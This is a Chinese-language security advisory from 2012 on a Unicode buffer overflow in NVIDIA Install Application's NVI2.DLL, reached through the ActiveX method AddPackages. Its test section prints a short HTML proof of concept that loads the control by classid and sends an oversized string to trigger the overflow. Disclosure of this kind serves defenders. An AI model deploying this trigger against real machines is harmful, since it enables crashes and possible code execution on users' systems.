发布日期：2012-12-06
更新日期：2012-12-07

受影响系统：

NVIDIA Install Application 2.1002.85.551

描述：

---

BUGTRAQ  ID: 56826

NVidia是世界领先的图形处理芯片和显卡制造商。

NVIDIA Install Application 2.1002.85.551（Microsoft Windows 7 Ultimate SP1 (EN) 32bit平台上）在处理'AddPackages'函数内的'pDirectory'字符串变量值时，NVI2.DLL存在边界检查错误，通过插入超长的数组，可造成unicode缓冲区溢出，导致任意代码执行。

<*来源：Gjoko Krstic （liquidworm@gmail.com）
  
  链接：http://packetstormsecurity.org/files/118648/ZSL-2012-5116.txt
        http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5116.php
        http://cxsecurity.com/issue/WLB-2012120055
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><body>
<object classid='clsid:A9C8F210-55EB-4849-8807-EC49C5389A79' id='attack' />
<script>
pDirectory=String(2068, "A")
attack.AddPackages pDirectory
</script>
</body></html>

建议：

---

厂商补丁：

NVIDIA
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nvidia.com/

浏览次数：4309
严重程度：0（网友投票）